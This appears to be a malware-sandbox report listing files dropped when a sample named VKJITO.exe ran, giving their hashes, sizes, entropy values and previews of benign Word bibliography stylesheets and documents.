                                    MD5:6C24ED9C7C868DB0D55492BB126EAFF8
                                    SHA1:C6D96D4D298573B70CF5C714151CF87532535888
                                    SHA-256:48AF17267AD75C142EFA7AB7525CA48FAB579592339FB93E92C4C4DA577D4C9F
                                    SHA-512:A3E9DC48C04DC8571289F57AE790CA4E6934FBEA4FDDC20CB780F7EA469FE1FC1D480A1DBB04D15301EF061DA5700FF0A793EB67D2811C525FEF618B997BCABD
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):333258
                                    Entropy (8bit):4.654450340871081
                                    Encrypted:false
                                    SSDEEP:6144:ybW83Zb181+MKHZR5D7H3hgtfL/8mIDbEhPv9FHSVsioWUyGYmwxAw+GIfnUNv5J:i
                                    MD5:5632C4A81D2193986ACD29EADF1A2177
                                    SHA1:E8FF4FDFEB0002786FCE1CF8F3D25F8E9631E346
                                    SHA-256:06DE709513D7976690B3DD8F5FDF1E59CF456A2DFBA952B97EACC72FE47B238B
                                    SHA-512:676CE1957A374E0F36634AA9CFFBCFB1E1BEFE1B31EE876483B10763EA9B2D703F2F3782B642A5D7D0945C5149B572751EBD9ABB47982864834EF61E3427C796
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):296658
                                    Entropy (8bit):5.000002997029767
                                    Encrypted:false
                                    SSDEEP:6144:RwprAMk0qvtfL/vF/bkWPz9yv7EOMBPitjASjTQQr7IwR0TnyDkJb78plJwf33iV:M
                                    MD5:9AC6DE7B629A4A802A41F93DB2C49747
                                    SHA1:3D6E929AA1330C869D83F2BF8EBEBACD197FB367
                                    SHA-256:52984BC716569120D57C8E6A360376E9934F00CF31447F5892514DDCCF546293
                                    SHA-512:5736F14569E0341AFB5576C94B0A7F87E42499CEC5927AAC83BB5A1F77B279C00AEA86B5F341E4215076D800F085D831F34E4425AD9CFD52C7AE4282864B1E73
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):268317
                                    Entropy (8bit):5.05419861997223
                                    Encrypted:false
                                    SSDEEP:6144:JwprAJLR95vtfb8p4bgWPzDCvCmvQursq7vImej/yQzSS1apSiQhHDOruvoVeMUh:N9
                                    MD5:51D32EE5BC7AB811041F799652D26E04
                                    SHA1:412193006AA3EF19E0A57E16ACF86B830993024A
                                    SHA-256:6230814BF5B2D554397580613E20681752240AB87FD354ECECF188C1EABE0E97
                                    SHA-512:5FC5D889B0C8E5EF464B76F0C4C9E61BDA59B2D1205AC9417CC74D6E9F989FB73D78B4EB3044A1A1E1F2C00CE1CA1BD6D4D07EEADC4108C7B124867711C31810
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):255948
                                    Entropy (8bit):5.103631650117028
                                    Encrypted:false
                                    SSDEEP:6144:gwprAm795vtfb8p4bgWPWEtTmtcRCDPThNPFQwB+26RxlsIBkAgRMBHcTCwsHe5a:kW
                                    MD5:9888A214D362470A6189DEFF775BE139
                                    SHA1:32B552EB3C73CD7D0D9D924C96B27A86753E0F97
                                    SHA-256:C64ED5C2A323C00E84272AD3A701CAEBE1DCCEB67231978DE978042F09635FA7
                                    SHA-512:8A75FC2713003FA40B9730D29C786C76A796F30E6ACE12064468DD2BB4BF97EF26AC43FFE1158AB1DB06FF715D2E6CDE8EF3E8B7C49AA1341603CE122F311073
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="utf-8"?>............<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select=
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):251032
                                    Entropy (8bit):5.102652100491927
                                    Encrypted:false
                                    SSDEEP:6144:hwprA5R95vtfb8p4bgWPwW6/m26AnV9IBgIkqm6HITUZJcjUZS1XkaNPQTlvB2zr:JA
                                    MD5:F425D8C274A8571B625EE66A8CE60287
                                    SHA1:29899E309C56F2517C7D9385ECDBB719B9E2A12B
                                    SHA-256:DD7B7878427276AF5DBF8355ECE0D1FE5D693DF55AF3F79347F9D20AE50DB938
                                    SHA-512:E567F283D903FA533977B30FD753AA1043B9DDE48A251A9AC6777A3B67667443FEAD0003765A630D0F840B6C275818D2F903B6CB56136BEDCC6D9BDD20776564
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):284415
                                    Entropy (8bit):5.00549404077789
                                    Encrypted:false
                                    SSDEEP:6144:N9G5o7Fv0ZcxrStAtXWty8zRLYBQd8itHiYYPVJHMSo27hlwNR57johqBXlwNR2b:y
                                    MD5:33A829B4893044E1851725F4DAF20271
                                    SHA1:DAC368749004C255FB0777E79F6E4426E12E5EC8
                                    SHA-256:C40451CADF8944A9625DD690624EA1BA19CECB825A67081E8144AD5526116924
                                    SHA-512:41C1F65E818C2757E1A37F5255E98F6EDEAC4214F9D189AD09C6F7A51F036768C1A03D6CFD5845A42C455EE189D13BB795673ACE3B50F3E1D77DAFF400F4D708
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2008</xsl:text>.....</xsl:when>.... <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <x
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):294178
                                    Entropy (8bit):4.977758311135714
                                    Encrypted:false
                                    SSDEEP:6144:ydkJ3yU0orh0SCLVXyMFsoiOjWIm4vW2uo4hfhf7v3uH4NYYP4BpBaZTTSSamEUD:b
                                    MD5:0C9731C90DD24ED5CA6AE283741078D0
                                    SHA1:BDD3D7E5B0DE9240805EA53EF2EB784A4A121064
                                    SHA-256:ABCE25D1EB3E70742EC278F35E4157EDB1D457A7F9D002AC658AAA6EA4E4DCDF
                                    SHA-512:A39E6201D6B34F37C686D9BD144DDD38AE212EDA26E3B81B06F1776891A90D84B65F2ABC5B8F546A7EFF3A62D35E432AF0254E2F5BFE4AA3E0CF9530D25949C0
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2006</xsl:text>.....</xsl:when>.. <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameL
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):270198
                                    Entropy (8bit):5.073814698282113
                                    Encrypted:false
                                    SSDEEP:6144:JwprAiaR95vtfb8pDbgWPzDCvCmvQursq7vImej/yQ4SS1apSiQhHDOruvoVeMUX:We
                                    MD5:FF0E07EFF1333CDF9FC2523D323DD654
                                    SHA1:77A1AE0DD8DBC3FEE65DD6266F31E2A564D088A4
                                    SHA-256:3F925E0CC1542F09DE1F99060899EAFB0042BB9682507C907173C392115A44B5
                                    SHA-512:B4615F995FAB87661C2DBE46625AA982215D7BDE27CAFAE221DCA76087FE76DA4B4A381943436FCAC1577CB3D260D0050B32B7B93E3EB07912494429F126BB3D
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):217137
                                    Entropy (8bit):5.068335381017074
                                    Encrypted:false
                                    SSDEEP:6144:AwprA3Z95vtf58pb1WP2DCvCmvQursq7vIme5QyQzSS1apSiQhHDlruvoVeMUwFj:4P
                                    MD5:3BF8591E1D808BCCAD8EE2B822CC156B
                                    SHA1:9CC1E5EFD715BD0EAE5AF983FB349BAC7A6D7BA0
                                    SHA-256:7194396E5C833E6C8710A2E5D114E8E24338C64EC9818D51A929D57A5E4A76C8
                                    SHA-512:D434A4C15DA3711A5DAAF5F7D0A5E324B4D94A04B3787CA35456BFE423EAC9D11532BB742CDE6E23C16FA9FD203D3636BD198B41C7A51E7D3562D5306D74F757
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>...... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parame
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):254875
                                    Entropy (8bit):5.003842588822783
                                    Encrypted:false
                                    SSDEEP:6144:MwprAnniNgtfbzbOWPuv7kOMBLitjAUjTQLrYHwR0TnyDkHqV3iPr1zHX5T6SSXj:a
                                    MD5:377B3E355414466F3E3861BCE1844976
                                    SHA1:0B639A3880ACA3FD90FA918197A669CC005E2BA4
                                    SHA-256:4AC5B26C5E66E122DE80243EF621CA3E1142F643DD2AD61B75FF41CFEE3DFFAF
                                    SHA-512:B050AD52A8161F96CBDC880DD1356186F381B57159F5010489B04528DB798DB955F0C530465AB3ECD5C653586508429D98336D6EB150436F1A53ABEE0697AEB9
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>...</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />......<xsl:variable name="prop_EndChars">.....<xsl:call-template name="templ_prop_EndChars"/>....</xsl:variable>......<xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parameters" />......
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):344303
                                    Entropy (8bit):5.023195898304535
                                    Encrypted:false
                                    SSDEEP:6144:UwprANnsqvtfL/vF/bkWPRMMv7EOMBPitjASjTQQr7IwR0TnyDk1b78plJwf33iD:6
                                    MD5:F079EC5E2CCB9CD4529673BCDFB90486
                                    SHA1:FBA6696E6FA918F52997193168867DD3AEBE1AD6
                                    SHA-256:3B651258F4D0EE1BFFC7FB189250DED1B920475D1682370D6685769E3A9346DB
                                    SHA-512:4FFFA59863F94B3778F321DA16C43B92A3053E024BDD8C5317077EA1ECC7B09F67ECE3C377DB693F3432BF1E2D947EC5BF8E88E19157ED08632537D8437C87D6
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$pa
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):250983
                                    Entropy (8bit):5.057714239438731
                                    Encrypted:false
                                    SSDEEP:6144:JwprA6OS95vtfb8p4bgWPzkhUh9I5/oBRSifJeg/yQzvapSiQhHZeruvoXMUw3im:uP
                                    MD5:F883B260A8D67082EA895C14BF56DD56
                                    SHA1:7954565C1F243D46AD3B1E2F1BAF3281451FC14B
                                    SHA-256:EF4835DB41A485B56C2EF0FF7094BC2350460573A686182BC45FD6613480E353
                                    SHA-512:D95924A499F32D9B4D9A7D298502181F9E9048C21DBE0496FA3C3279B263D6F7D594B859111A99B1A53BD248EE69B867D7B1768C42E1E40934E0B990F0CE051E
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Word 2007+
                                    Category:dropped
                                    Size (bytes):51826
                                    Entropy (8bit):5.541375256745271
                                    Encrypted:false
                                    SSDEEP:384:erH5dYPCA4t3aEFGiSUDtYfEbi5Ry/AT7/6tHODaFlDSomurYNfT4A0VIwWNS89u:Q6Cbh9tENyWdaFUSYNfZS89/3qtEu
                                    MD5:2AB22AC99ACFA8A82742E774323C0DBD
                                    SHA1:790F8B56DF79641E83A16E443A75A66E6AA2F244
                                    SHA-256:BC9D45D0419A08840093B0BF4DCF96264C02DFE5BD295CD9B53722E1DA02929D
                                    SHA-512:E5715C0ECF35CE250968BD6DE5744D28A9F57D20FD6866E2AF0B2D8C8F80FEDC741D48F554397D61C5E702DA896BD33EED92D778DBAC71E2E98DCFB0912DE07B
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Word 2007+
                                    Category:dropped
                                    Size (bytes):47296
                                    Entropy (8bit):6.42327948041841
                                    Encrypted:false
                                    SSDEEP:768:ftjI1BT8N37szq00s7dB2wMVJGHR97/RDU5naXUsT:fJIPTfq0ndB2w1bpsE
                                    MD5:5A53F55DD7DA8F10A8C0E711F548B335
                                    SHA1:035E685927DA2FECB88DE9CAF0BECEC88BC118A7
                                    SHA-256:66501B659614227584DA04B64F44309544355E3582F59DBCA3C9463F67B7E303
                                    SHA-512:095BD5D1ACA2A0CA3430DE2F005E1D576AC9387E096D32D556E4348F02F4D658D0E22F2FC4AA5BF6C07437E6A6230D2ABF73BBD1A0344D73B864BC4813D60861
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Word 2007+
                                    Category:dropped
                                    Size (bytes):34415
                                    Entropy (8bit):7.352974342178997
                                    Encrypted:false
                                    SSDEEP:768:ev13NPo9o5NGEVIi3kvH+3SMdk7zp3tE2:ev13xoOE+R3BkR7
                                    MD5:7CDFFC23FB85AD5737452762FA36AAA0
                                    SHA1:CFBC97247959B3142AFD7B6858AD37B18AFB3237
                                    SHA-256:68A8FBFBEE4C903E17C9421082E839144C205C559AFE61338CBDB3AF79F0D270
                                    SHA-512:A0685FD251208B772436E9745DA2AA52BC26E275537688E3AB44589372D876C9ACE14B21F16EC4053C50EB4C8E11787E9B9D922E37249D2795C5B7986497033E
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Word 2007+
                                    Category:dropped
                                    Size (bytes):3465076
                                    Entropy (8bit):7.898517227646252
                                    Encrypted:false
                                    SSDEEP:98304:n8ItVaN7vTMZ9IBbaETXbI8ItVaN7vTMZ9IBbaEiXbY:8ItwNX9BvTvItwNX9BvoM
                                    MD5:8BC84DB5A3B2F8AE2940D3FB19B43787
                                    SHA1:3A5FE7B14D020FAD0E25CD1DF67864E3E23254EE
                                    SHA-256:AF1FDEEA092169BF794CDC290BCA20AEA07AC7097D0EFCAB76F783FA38FDACDD
                                    SHA-512:558F52C2C79BF4A3FBB8BB7B1C671AFD70A2EC0B1BDE10AC0FED6F5398E53ED3B2087B38B7A4A3D209E4F1B34150506E1BA362E4E1620A47ED9A1C7924BB9995
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):18
                                    Entropy (8bit):2.836591668108979
                                    Encrypted:false
                                    SSDEEP:3:QETlbol9:QEiv
                                    MD5:5FFBAD261CA1D087BDEA2DAA185561A0
                                    SHA1:A961E6EBC140F64BC9CBD47EB820DF77764969AB
                                    SHA-256:2FFE94EBE8D67CD72EE7F1D088DA8AC1B6BA2EBAB80463CC38AC10617ADF933B
                                    SHA-512:DE56BFA3EF7EB40E7D40CCEC2A99795CEEEB708F7D2E47520A6F82AAC3A72D69F4887BF3C515FB0C0136AF6D04DC90E4CBF4A704E13561EC3171373ABAE1D73A
                                    Malicious:false
                                    Preview:..a.l.f.o.n.s.....
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                    Category:dropped
                                    Size (bytes):2
                                    Entropy (8bit):1.0
                                    Encrypted:false
                                    SSDEEP:3:Qn:Qn
                                    MD5:F3B25701FE362EC84616A93A45CE9998
                                    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                    Malicious:false
                                    Preview:..
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):12
                                    Entropy (8bit):0.41381685030363374
                                    Encrypted:false
                                    SSDEEP:3:/l:
                                    MD5:E4A1661C2C886EBB688DEC494532431C
                                    SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                    SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                    SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                    Malicious:false
                                    Preview:............
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):12
                                    Entropy (8bit):0.41381685030363374
                                    Encrypted:false
                                    SSDEEP:3:/l:
                                    MD5:E4A1661C2C886EBB688DEC494532431C
                                    SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                    SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                    SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                    Malicious:false
                                    Preview:............
                                    Process:C:\Users\user\Desktop\VKJITO.exe
                                    File Type:Microsoft Word 2007+
                                    Category:dropped
                                    Size (bytes):11302
                                    Entropy (8bit):7.78963878169505
                                    Encrypted:false
                                    SSDEEP:192:oxrJWWLa/DWjTFQEnxkC7X8t53ZGND1FHGtShPjF3LyvyOmBKOEJrmsvAM3cO:oxrvm/SjTCsxH7X+pGND19GtUPpoxJO2
                                    MD5:FD69658D599611807EE4B8F3E42531BC
                                    SHA1:712DF7C90458621F01D3045EBAAF76455CDF279B
                                    SHA-256:3AFD75C39B4563F333B32F9D5C1119A84FF67596974E9C6B7AC59C7902F1CA81
                                    SHA-512:1893470F3E15A3FFC21F928D6EA1B8C2A59F8353D3ADBC0EA03A8697A5BDC2E0ACF544FAC55EA75A8E93F179EF0D771F352CE2687CBBB103EF3261939A1DD62B
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):162
                                    Entropy (8bit):4.418155720831298
                                    Encrypted:false
                                    SSDEEP:3:0sk72906xkA/mJQxOfgSRGGXTkM+uU0YPRaa122k:0sU22aJ+2G3UhP8Jf
                                    MD5:D17076CC1684CD585FF2A994205F7134
                                    SHA1:36A64DBB913E8F8ADDC8D2779320DCB735C76E95
                                    SHA-256:2EAB01B8FF842C20EF09188441D2AAE9A4F9521ED3EF04CB46BE0BE6AC5E89F1
                                    SHA-512:EE230B256B8E2FD5844541A53ED40B8746497F36770AAB224B3DAEB303D9C7976264F03A49B35A40AFBF0CD3FC7C6168EC257BD794567733B2F887B32E95323E
                                    Malicious:false
                                    Preview:..........................................................N.@|.I~b...........[Content_Types].xml...n.0.E......Ub.*..>.-....3..~.`Q........#...S.}.j.....SS..=Wj
                                    Process:C:\Windows\System32\WerFault.exe
                                    File Type:MS Windows registry file, NT/2000 or above
                                    Category:dropped
                                    Size (bytes):1835008
                                    Entropy (8bit):4.4217052044964795
                                    Encrypted:false
                                    SSDEEP:6144:3Svfpi6ceLP/9skLmb0OTcWSPHaJG8nAgeMZMMhA2fX4WABlEnNv0uhiTw:ivloTcW+EZMM6DFyh03w
                                    MD5:4740B203CC7FA943AC336560F236711D
                                    SHA1:D94163BA7F8229CE0730540738C15DF695A0F29F
                                    SHA-256:EE4902ADDC52700A85960FC3939E2F414F5398BCE2341D532DEE368288192399
                                    SHA-512:E8061983DAAB7A98D7335A45132F1E0EE0886842B84562DB471A3B39322FABEBE054457EC8AE8BE2B4F7EDA008AD25FA0F4557A60B538287BF1E4EFA87976D3F
                                    Malicious:false
                                    File type:PE32+ executable (GUI) x86-64, for MS Windows
                                    Entropy (8bit):6.476037002247636
                                    TrID:
                                    • Win64 Executable GUI (202006/5) 92.65%
                                    • Win64 Executable (generic) (12005/4) 5.51%
                                    • Generic Win/DOS Executable (2004/3) 0.92%
                                    • DOS Executable Generic (2002/1) 0.92%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:VKJITO.exe
                                    File size:505'856 bytes
                                    MD5:34bfa047aaca8fd4dc99759ebf0e1a6a
